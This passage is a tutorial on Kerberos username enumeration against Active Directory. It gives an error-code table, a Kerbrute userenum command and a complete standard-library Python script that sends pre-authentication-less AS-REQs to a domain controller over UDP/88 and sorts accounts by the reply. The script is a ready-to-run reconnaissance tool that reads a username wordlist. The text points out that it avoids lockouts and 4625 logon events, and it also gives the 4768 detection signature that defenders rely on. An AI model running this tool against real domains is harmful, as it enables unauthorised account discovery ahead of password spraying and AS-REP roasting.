User Enumeration

Kerberos responds differently to an AS‑REQ depending on whether the requested username exists in the domain, so an attacker can enumerate valid usernames without ever completing an authentication attempt. User enumeration is performed by sending AS‑REQ messages that carry no pre‑authentication data (no PA-ENC-TIMESTAMP): the KDC has to answer from the account's state alone, and the KRB-ERROR it returns distinguishes existing, locked and unknown accounts. Unlike a traditional brute‑force attempt, this does not produce the standard Windows logon failure event (Event ID 4625), because the request never reaches the stage where a logon is formally recorded. Each username is validated with a single AS‑REQ to the KDC on port 88 (UDP or TCP) and inspection of the reply.

Kerberos Error (code)                User Status

KDC_ERR_PREAUTH_REQUIRED (0x19)      Present / enabled (pre‑authentication required)
KDC_ERR_CLIENT_REVOKED (0x12)        Locked out, disabled or expired
KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6)    Does not exist

If the KDC answers with an AS‑REP instead of an error, the account exists and has "Do not require Kerberos preauthentication" set, which also makes it an AS‑REP roasting candidate.

Because no password is presented, the request does not increment the account's bad‑password count (badPwdCount) and therefore cannot cause a lockout. In most environments it also generates minimal logging; if failure auditing for the Kerberos Authentication Service subcategory is enabled on the domain controller, Event ID 4768 may still be recorded for each probe, and a burst of 4768 events with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from a single source is the usual detection signature for a wordlist being run against the KDC. The technique is commonly automated with Kerbrute, which uses the same Kerberos protocol behaviour for both username enumeration and password spraying.

# Enumerate users
kerbrute userenum users.txt --dc dc01.marvel.local -d marvel.local
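As an added example (not code from the page or from Kerbrute), the following Python script builds the same pre‑authentication‑less AS‑REQ by hand with a minimal DER encoder, classifies the KDC's reply by its KRB-ERROR error-code exactly as the table above does, and can send the probe to a domain controller over UDP/88 using only the standard library. The realm MARVEL.LOCAL, the script and argument names, and the sample KRB-ERROR replies used for offline checking are assumptions. It also handles the two replies the table does not list: an AS-REP (pre‑authentication disabled on the account) and KRB_ERR_RESPONSE_TOO_BIG, which a KDC returns over UDP when that AS-REP would not fit in a datagram.

```python
"""Kerberos user enumeration with a hand-built AS-REQ (added example, not from the
page or from Kerbrute). Realm MARVEL.LOCAL and the sample replies are constructed."""
import os
import socket
import sys

# Minimal DER encoder: only the types AS-REQ and KRB-ERROR need.
def _length(n):
    if n < 0x80:                      # short form; long form above 127
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b
def tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body
def integer(v):                       # shortest two's-complement INTEGER
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))
def ctx(n, body):                     # context-specific constructed tag [n]
    return tlv(0xA0 | n, body)
def seq(*items):                      # SEQUENCE / SEQUENCE OF
    return tlv(0x30, b"".join(items))
def gstring(s):                       # KerberosString = GeneralString
    return tlv(0x1B, s.encode())
def gtime(s):                         # KerberosTime = GeneralizedTime
    return tlv(0x18, s.encode())
def principal(name_type, *parts):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gstring(p) for p in parts])))

# RFC 4120 constants
KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED, KDC_ERR_PREAUTH_REQUIRED = 6, 18, 25
KRB_ERR_RESPONSE_TOO_BIG = 52         # KDC would have sent an AS-REP, but it exceeds the UDP limit
NT_PRINCIPAL, NT_SRV_INST = 1, 2
APP_AS_REQ, APP_AS_REP, APP_KRB_ERROR = 0x6A, 0x6B, 0x7E   # [APPLICATION 10 / 11 / 30]
STATUS = {KDC_ERR_PREAUTH_REQUIRED: "present/enabled",
          KDC_ERR_CLIENT_REVOKED: "locked out, disabled or expired",
          KDC_ERR_C_PRINCIPAL_UNKNOWN: "does not exist",
          KRB_ERR_RESPONSE_TOO_BIG: "present, pre-auth not required (retry over TCP)"}

def build_as_req(username, realm, nonce):
    """AS-REQ for krbtgt/REALM with the [3] padata field left out entirely,
    so the KDC has to answer from the account's state alone."""
    body = seq(
        ctx(0, tlv(0x03, b"\x00\x40\x80\x00\x10")),        # kdc-options: forwardable, renewable, renewable-ok
        ctx(1, principal(NT_PRINCIPAL, username)),          # cname
        ctx(2, gstring(realm)),                             # realm
        ctx(3, principal(NT_SRV_INST, "krbtgt", realm)),    # sname
        ctx(5, gtime("20370913024805Z")),                   # till
        ctx(7, integer(nonce)),                             # nonce
        ctx(8, seq(integer(18), integer(17), integer(23))), # etype: AES256, AES128, RC4
    )
    return tlv(APP_AS_REQ, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))

def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                      # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def classify_response(msg):
    """Map a raw KDC reply to the account status it reveals."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag == APP_AS_REP:
        # A TGT came back with no pre-auth at all: the account exists and has
        # "Do not require Kerberos preauthentication" set (AS-REP roastable).
        return "present, pre-auth not required"
    if tag != APP_KRB_ERROR:
        return "unexpected message"
    _, fields, _ = _read_tlv(body, 0)                      # inner SEQUENCE of KRB-ERROR
    pos = 0
    while pos < len(fields):
        tag, val, pos = _read_tlv(fields, pos)
        if tag == 0xA6:                                    # [6] error-code
            _, raw, _ = _read_tlv(val, 0)
            code = int.from_bytes(raw, "big", signed=True)
            return STATUS.get(code, f"other KRB-ERROR {code}")
    return "malformed KRB-ERROR"

def sample_krb_error(error_code, realm="MARVEL.LOCAL"):
    """Constructed KRB-ERROR with its mandatory fields, for offline testing."""
    return tlv(APP_KRB_ERROR, seq(
        ctx(0, integer(5)), ctx(1, integer(30)),
        ctx(4, gtime("20240101000000Z")), ctx(5, integer(0)),
        ctx(6, integer(error_code)),
        ctx(9, gstring(realm)), ctx(10, principal(NT_SRV_INST, "krbtgt", realm))))

def probe(dc_ip, username, realm, timeout=3.0):
    """One AS-REQ over UDP/88: no password, so no badPwdCount bump and no 4625."""
    nonce = int.from_bytes(os.urandom(4), "big") & 0x7FFFFFFF
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_as_req(username, realm, nonce), (dc_ip, 88))
        reply, _ = s.recvfrom(4096)
    return classify_response(reply)

if __name__ == "__main__":
    # usage (file and argument names assumed): python krb_userenum.py <dc-ip> <REALM> < users.txt
    dc_ip, realm = sys.argv[1], sys.argv[2].upper()
    for user in (l.strip() for l in sys.stdin if l.strip()):
        print(f"{user}: {probe(dc_ip, user, realm)}")
```

The message is sent raw over UDP; over TCP, Kerberos prefixes each message with a 4‑byte big‑endian length, which is also the transport to switch to when the KDC answers KRB_ERR_RESPONSE_TOO_BIG. Every probe still reaches the KDC, so the logging caveat above applies unchanged.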
